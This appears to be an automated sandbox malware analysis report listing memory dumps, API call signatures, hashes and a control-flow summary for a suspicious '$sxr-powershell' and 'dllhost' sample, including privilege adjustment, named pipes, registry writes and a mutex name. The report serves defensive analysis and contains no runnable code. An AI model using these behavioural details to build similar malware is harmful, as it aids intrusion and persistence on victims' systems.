                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1092925422-0
                                                                                                                      • Opcode ID: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                                      • Instruction ID: f4583b6a175e8337e864dbce55850077dfa8be934b5ac415ae73fe8ebaa8977f
                                                                                                                      • Opcode Fuzzy Hash: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
                                                                                                                      • Instruction Fuzzy Hash: 14111926605F44D7FB648B22E94825EB7B0F785B80F844126EA8D03B94EF39C949E751
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2924790905.0000024287880000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000024287880000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_24287880000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                      • String ID: csm$f
                                                                                                                      • API String ID: 3242871069-629598281
                                                                                                                      • Opcode ID: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
                                                                                                                      • Instruction ID: 1a8c1a66975c0376a8d0b67916ce8094e61a768ab4b40edd771f6c5e777fa4e2
                                                                                                                      • Opcode Fuzzy Hash: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
                                                                                                                      • Instruction Fuzzy Hash: 77519336721A08CAEB54DF16DC8CB1D37A5F3C4B98F918124FA1647788EB34DD89A724
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2924790905.0000024287880000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000024287880000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_24287880000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                      • String ID: csm$f
                                                                                                                      • API String ID: 3242871069-629598281
                                                                                                                      • Opcode ID: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
                                                                                                                      • Instruction ID: 61ae9168a048650dbea6c8268f6cc7cf5c94ca7f3ed896cae57903f33533c51e
                                                                                                                      • Opcode Fuzzy Hash: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
                                                                                                                      • Instruction Fuzzy Hash: 5A318B32221A44DAE754DF13EC8CB1D77A5F780BC8F858114BE5647788DB38C989DB24
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileType
                                                                                                                      • String ID: \\.\pipe\
                                                                                                                      • API String ID: 3081899298-91387939
                                                                                                                      • Opcode ID: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
                                                                                                                      • Instruction ID: 5973971a9dbe32c64071ab0e78dd83c42a1130323f939945f63f6377bc8d51ad
                                                                                                                      • Opcode Fuzzy Hash: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
                                                                                                                      • Instruction Fuzzy Hash: FC71AC32200F89C2E7649A3B9D497AE7790F7C5B84FC40026FE4D47B99DE35C688A750
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileType
                                                                                                                      • String ID: \\.\pipe\
                                                                                                                      • API String ID: 3081899298-91387939
                                                                                                                      • Opcode ID: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
                                                                                                                      • Instruction ID: 0ac368452b6202ad694e0877350d488fb260446bb20df8a6712e35fb499e6776
                                                                                                                      • Opcode Fuzzy Hash: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
                                                                                                                      • Instruction Fuzzy Hash: 1151C532204BC9C2E675DA2BA85C7AE7791F7CA780FD40025ED8903B99CB39C589A754
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                      • Opcode ID: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
                                                                                                                      • Instruction ID: 5120e88b4132f6b75c1830df960729af01e04e9ce8af581c4d474e2649275e05
                                                                                                                      • Opcode Fuzzy Hash: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
                                                                                                                      • Instruction Fuzzy Hash: 3941B232216A48D1EB609F26EC493AE77A0F3C87D4F804021EE4D87B98DB39C449DB60
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 00000242878B2A4D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleMutexOpen
                                                                                                                      • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                                      • API String ID: 3128266590-3670590667
                                                                                                                      • Opcode ID: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
                                                                                                                      • Instruction ID: 2454d994f2ffbbbbab1b053be6b9d75d5fd99c34b8aac145e97227e4d1861528
                                                                                                                      • Opcode Fuzzy Hash: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
                                                                                                                      • Instruction Fuzzy Hash: 22217F26204F48C6E770CB17AC4861EB290F7D4BA0FD55115EE8943794EF38C489E710
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 00000242878B2B39
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleMutexOpen
                                                                                                                      • String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
                                                                                                                      • API String ID: 3128266590-3670590667
                                                                                                                      • Opcode ID: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                                      • Instruction ID: b4f52836db5ece12ce3474e72006215bf1dd8b68e0b56dd6ff4e52d6796618dc
                                                                                                                      • Opcode Fuzzy Hash: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
                                                                                                                      • Instruction Fuzzy Hash: E1214822600F48C2E7609F17AC4875EB3A4F7C8B94FC44025EE8983754EF34C88AA750
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Stringtry_get_function
                                                                                                                      • String ID: LCMapStringEx
                                                                                                                      • API String ID: 2588686239-3893581201
                                                                                                                      • Opcode ID: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
                                                                                                                      • Instruction ID: 3a23ee5cb0f6fb42c31e4c66133549b8a3fecb74301eb6ddcfb625ec7e7b532c
                                                                                                                      • Opcode Fuzzy Hash: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
                                                                                                                      • Instruction Fuzzy Hash: CE111A36608BC4C6E7A0DB16F84429EB7A4F7C9B90F944126FE8D83B19DF38C5489B50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                      • String ID: csm
                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                      • Opcode ID: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
                                                                                                                      • Instruction ID: c0a853a66a1f6816b8146f570d98443459de868cade9ac574d850c807f3e4b09
                                                                                                                      • Opcode Fuzzy Hash: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
                                                                                                                      • Instruction Fuzzy Hash: F0113A32215B88C2EB608B26F88425DB7A5F7D8B94F584220EE8D07B64DF39C555DB10
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                                                                                      • String ID: InitializeCriticalSectionEx
                                                                                                                      • API String ID: 539475747-3084827643
                                                                                                                      • Opcode ID: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
                                                                                                                      • Instruction ID: 64db137c6273b1633f17dee013e8f736dcf40025c40eb91d46f100af1def2add
                                                                                                                      • Opcode Fuzzy Hash: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
                                                                                                                      • Instruction Fuzzy Hash: 85F0BE25209F48E1FB859B43BC0868C7670FBC8B90FC84022BA0D03B19CE38C58DEB20
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Valuetry_get_function
                                                                                                                      • String ID: FlsSetValue
                                                                                                                      • API String ID: 738293619-3750699315
                                                                                                                      • Opcode ID: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
                                                                                                                      • Instruction ID: 031b1a15519edeb2c29795d2a86228ad8fbea6dd58c89b0160b1ba342fee89b5
                                                                                                                      • Opcode Fuzzy Hash: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
                                                                                                                      • Instruction Fuzzy Hash: 9FE03061205E08E2FE855B57BC0829C7221B7C8780FD84026B92D06655DE38C49DE631
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 756756679-0
                                                                                                                      • Opcode ID: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
                                                                                                                      • Instruction ID: 360a348532fe5a92972625e17eb10d7484a17190da89f7f21496a8893d4be203
                                                                                                                      • Opcode Fuzzy Hash: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
                                                                                                                      • Instruction Fuzzy Hash: 76215622605F88C6EB518F5AE80825EF3A1FBC4B94F954015FE8D47B24EB78C4569750
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1617791916-0
                                                                                                                      • Opcode ID: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
                                                                                                                      • Instruction ID: a8eb5a468c1ff8a4eae72fee16c0ea1cdc69b1dd1897ee5b43121a01d5569298
                                                                                                                      • Opcode Fuzzy Hash: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
                                                                                                                      • Instruction Fuzzy Hash: E2E03971602A08DAF7448F63D80834936E1EBC9B01F898028D90907750EF7D849AA761
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:68.6%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:39.3%
                                                                                                                      Total number of Nodes:61
                                                                                                                      Total number of Limit Nodes:5
                                                                                                                      execution_graph 226 140001584 227 1400015a6 226->227 228 1400015ae GetTokenInformation 227->228 231 140001613 227->231 229 1400015d0 228->229 228->231 230 1400015ef GetTokenInformation 229->230 229->231 230->231 232 140001f94 235 140001fa1 232->235 234 140001fc1 ConnectNamedPipe 236 140001fef 234->236 235->234 237 14000165c 235->237 239 1400016b1 237->239 238 140001794 238->235 239->238 240 140001754 CreateNamedPipeW 239->240 240->238 241 140001b1c 244 140001b30 241->244 268 140001908 244->268 247 140001908 6 API calls 248 140001be6 247->248 249 140001c8e FindResourceA 248->249 251 140001c21 LookupPrivilegeValueW 248->251 252 140001c85 FindCloseChangeNotification 248->252 250 140001b25 249->250 255 140001cae 249->255 251->252 253 140001c3b AdjustTokenPrivileges 251->253 252->249 253->252 254 140001c7f 253->254 254->252 255->250 279 140001390 255->279 257 140001cf8 RegCreateKeyExW 258 140001e15 CreateThread 257->258 259 140001d3a 257->259 260 140001e3c CreateThread 258->260 261 140001d6e RegSetKeySecurity 259->261 262 140001d8f RegCreateKeyExW 259->262 266 140001e7a SleepEx 260->266 261->262 263 140001e0a 262->263 264 140001dcb RegSetValueExW RegCloseKey 262->264 263->258 264->263 266->266 269 140001911 268->269 274 140001aee 268->274 270 1400019a2 K32GetModuleInformation 269->270 269->274 271 1400019be CreateFileW 270->271 270->274 272 1400019f3 CreateFileMappingW 271->272 271->274 273 140001a1d MapViewOfFile 272->273 272->274 275 140001ae5 FindCloseChangeNotification 273->275 277 140001a41 273->277 274->247 275->274 276 140001a5c lstrcmpi 276->277 278 140001a8d 276->278 277->275 277->276 277->278 278->275 280 1400013ab 279->280 283 14000119c 280->283 282 1400013d4 284 1400011d5 K32EnumProcesses 283->284 286 1400012fc RtlDeleteBoundaryDescriptor 284->286 290 140001229 284->290 289 140001316 RtlDeleteBoundaryDescriptor 286->289 288 14000125b K32EnumProcessModules 288->290 289->282 290->286 290->288 291 1400014ec 294 140001510 291->294 292 140001541 293 140001538 FindCloseChangeNotification 293->292 294->292 294->293 295 140001ed0 297 140001ef1 295->297 296 140001f26 K32EnumProcesses 296->297 297->296

                                                                                                                      Callgraph

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2085757008.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Create$CloseFileFind$ChangeNotificationThreadValue$AdjustInformationLookupMappingModulePrivilegePrivilegesResourceSecuritySleepTokenViewlstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3489061390-0
                                                                                                                      • Opcode ID: 5edfb5cbc0324eee5daa172a89d16951d682391955e0b3df23fa179d5a448a1d
                                                                                                                      • Instruction ID: b0e1fb852f6e0543cbb1d0b345f32bc6fd7345078760f1e0bc57de08f7ced3b6
                                                                                                                      • Opcode Fuzzy Hash: 5edfb5cbc0324eee5daa172a89d16951d682391955e0b3df23fa179d5a448a1d
                                                                                                                      • Instruction Fuzzy Hash: CF9109B6205B8096EB26CF62F8547DA73A9F78CB94F408125EB4A47B74DF78C549C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2085757008.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BoundaryDeleteDescriptorEnum$ModulesProcessProcesses
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 330119047-0
                                                                                                                      • Opcode ID: b99cea897b55ce22ee55f00a709a12b981a6df01a8b7777c8743b117f59de58e
                                                                                                                      • Instruction ID: 722e7c41bd921b01580d5e9fcb7604c5b43dbddabd9dc005843a26f70c2221f1
                                                                                                                      • Opcode Fuzzy Hash: b99cea897b55ce22ee55f00a709a12b981a6df01a8b7777c8743b117f59de58e
                                                                                                                      • Instruction Fuzzy Hash: 6B5189B2711A809AEB66CF63A848BEA22A5F78DBC4F444025EF4A47768DF38C555C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 105 14000165c-1400016b3 107 140001794 105->107 108 1400016b9-1400016c1 105->108 109 140001798-1400017aa 107->109 110 1400016c4-1400016da 108->110 110->110 111 1400016dc-140001714 110->111 111->107 113 140001716-140001728 111->113 113->107 115 14000172a-14000173a 113->115 115->107 117 14000173c-140001752 115->117 117->107 119 140001754-140001792 CreateNamedPipeW 117->119 119->109
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2085757008.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateNamedPipe
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2489174969-0
                                                                                                                      • Opcode ID: 62dafb1268ee9213ecbaf6c178ea5b5ed500df257eb2683acba7299805e1f63b
                                                                                                                      • Instruction ID: 5e84f6bf4889631b23437abf526e9bdf5af4b3ca6bd4e12e17f1e2086ffe5991
                                                                                                                      • Opcode Fuzzy Hash: 62dafb1268ee9213ecbaf6c178ea5b5ed500df257eb2683acba7299805e1f63b
                                                                                                                      • Instruction Fuzzy Hash: 7B414BB2615B50CAE761CF25E4807DD77B4F788B98F44522AFB4943BA8EB78C548CB40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2085757008.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File$Create$ChangeCloseFindInformationMappingModuleNotificationViewlstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 910215268-0
                                                                                                                      • Opcode ID: 2f1acf1cbdab51ed4474075f2a8db35881d4879a2f724898911980b73aff03a9
                                                                                                                      • Instruction ID: f2b1c273cdc5545e6e8c12de746a27ba9334337610d31b556cae7d200a6f3496
                                                                                                                      • Opcode Fuzzy Hash: 2f1acf1cbdab51ed4474075f2a8db35881d4879a2f724898911980b73aff03a9
                                                                                                                      • Instruction Fuzzy Hash: 3B5139B6305A8192EB22DF16B458BDA73A9FB8DBD8F044125EF4A037A4DF38C549C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 91 140001584-1400015a8 93 140001647-140001658 91->93 94 1400015ae-1400015ce GetTokenInformation 91->94 95 14000163c 94->95 96 1400015d0-1400015d9 94->96 95->93 96->95 98 1400015db-1400015ed 96->98 98->95 100 1400015ef-140001611 GetTokenInformation 98->100 101 140001633 100->101 102 140001613-140001631 100->102 101->95 102->101
                                                                                                                      APIs
                                                                                                                      • GetTokenInformation.KERNELBASE(?,?,?,?,00000000,00000001400010A1), ref: 00000001400015C6
                                                                                                                      • GetTokenInformation.KERNELBASE(?,?,?,?,00000000,00000001400010A1), ref: 0000000140001609
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2085757008.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InformationToken
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4114910276-0
                                                                                                                      • Opcode ID: bb1ede16d749b0aa8d49f68615aa5427a420d8c7a4dd9ca7b8525546133cb06c
                                                                                                                      • Instruction ID: 2eae3c48201e6f103262f764e10c79d14b5d21d5893c39f3542a132d265f3134
                                                                                                                      • Opcode Fuzzy Hash: bb1ede16d749b0aa8d49f68615aa5427a420d8c7a4dd9ca7b8525546133cb06c
                                                                                                                      • Instruction Fuzzy Hash: B52139B6204A8082EB12CF62F85479AB764FBCCBD4F448525EB8947B78DF79C545CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 120 140001ed0-140001f24 125 140001f26-140001f39 K32EnumProcesses 120->125 126 140001f86-140001f8f 125->126 127 140001f3b-140001f4a 125->127 126->125 128 140001f74-140001f82 call 140001450 127->128 129 140001f4c-140001f50 127->129 128->126 131 140001f52 129->131 132 140001f63-140001f66 call 140001eb0 129->132 134 140001f56-140001f5b 131->134 138 140001f6a 132->138 136 140001f5d-140001f61 134->136 137 140001f6e-140001f72 134->137 136->132 136->134 137->128 137->129 138->137
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2085757008.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: EnumProcesses
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 84517404-0
                                                                                                                      • Opcode ID: 62dbe63adaa786fff5273d6083a5c992f197b0eddf441f0438fa731615d6977e
                                                                                                                      • Instruction ID: 3e335d43075e719169e469211f82513eafd9eb7e81d155af191f1dae7c0dcdef
                                                                                                                      • Opcode Fuzzy Hash: 62dbe63adaa786fff5273d6083a5c992f197b0eddf441f0438fa731615d6977e
                                                                                                                      • Instruction Fuzzy Hash: F2214AB6605A129BE716CF17B4547EAB6A6F7C9BD1F144028EB4607A78CF39D440CA40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 140 1400014ec-140001516 142 140001541-140001552 140->142 143 140001518-140001528 140->143 145 140001538-14000153b FindCloseChangeNotification 143->145 146 14000152a-140001533 143->146 145->142 146->145
                                                                                                                      APIs
                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,?,?,000000014000103E), ref: 000000014000153B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2085757008.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2591292051-0
                                                                                                                      • Opcode ID: 6bc9b99de388f3e59490879e904058593ad480db252299c408dbbe8cd014b142
                                                                                                                      • Instruction ID: 44c5bdf9c31fdf4bd35f48c43806700b171b0c8e6473a7c39bf54194b38a2f46
